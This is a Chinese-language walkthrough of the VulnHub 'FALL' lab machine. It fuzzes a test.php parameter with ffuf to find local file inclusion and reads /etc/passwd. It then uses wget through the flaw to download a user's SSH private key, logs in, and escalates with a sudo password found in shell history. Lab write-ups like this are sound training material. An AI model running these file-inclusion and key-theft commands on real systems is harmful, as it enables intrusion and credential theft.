靶场练习-vulnhub：DIGITALWORLD.LOCAL_FALL - VulnHub - 靶场练习 | 🎐清风. = 劈开深海，填入我的山🍂

# 靶场搭建

下载导入，直接启动就能用。

IP： 192.168.1.138

80 端口的 CMS 是 CMS Made Simple 2.2.15 。有 RCE 可以利用的，但是需要登录。

查看网站上的信息有两个用户 qiu 和 patrick 。提示了 backdoor 后门，就是那个 RCE 应该。

[01:51:48] 200 -   17B  - /phpinfo.php  
[01:52:07] 200 -   80B  - /test.php 
[01:52:09] 200 -    1KB - /tmp/ 
[01:52:11] 200 -    0B  - /uploads/

test.php 页面需要加参数，那就 fuzz 一下参数。

fuzz 需要牛逼的字典，所以先安装一下 seclists

然后用 ffuf 进行参数的 fuzz，先 fuzz 一下参数，LFI

	┌──(root㉿kali)-[~]
	└─# ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.138/test.php?FUZZ=/etc/passwd' -fs 80

	/'___\ /'___\ /'___\
	/\ \__/ /\ \__/ __ __ /\ \__/
	\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
	\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
	\ \_\ \ \_\ \ \____/ \ \_\
	\/_/ \/_/ \/___/ \/_/

	v2.1.0-dev
	________________________________________________

	:: Method : GET
	:: URL : http://192.168.1.138/test.php?FUZZ=/etc/passwd
	:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
	:: Follow redirects : false
	:: Calibration : false
	:: Timeout : 10
	:: Threads : 40
	:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
	:: Filter : Response size: 80
	________________________________________________

	file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 36ms]
	:: Progress: [4727/4727] :: Job [1/1] :: 1025 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

找到了一个 file 参数的文件包含，通过 passwd 文件看到 qiu 用户有 bash 权限的

那么我们继续用文件包含寻找敏感的文件，shadow 包不了的，包一下 qiu 用户下的 ssh 私钥

直接下载： wget http://192.168.1.138/test.php?file=/home/qiu/.ssh/id_rsa -O id_rsa

OK 了家人们，直接用私钥 ssh 登上终端了。

登录到 qiu 的 shell 之后，sudo 要密码，查看一下子历史命令发现第四条是密码： remarkablyawesomE

sudo su 直接 root 拿下！

fuzz 参数，需要盘排除一下正常的 size，要熟悉各种字典。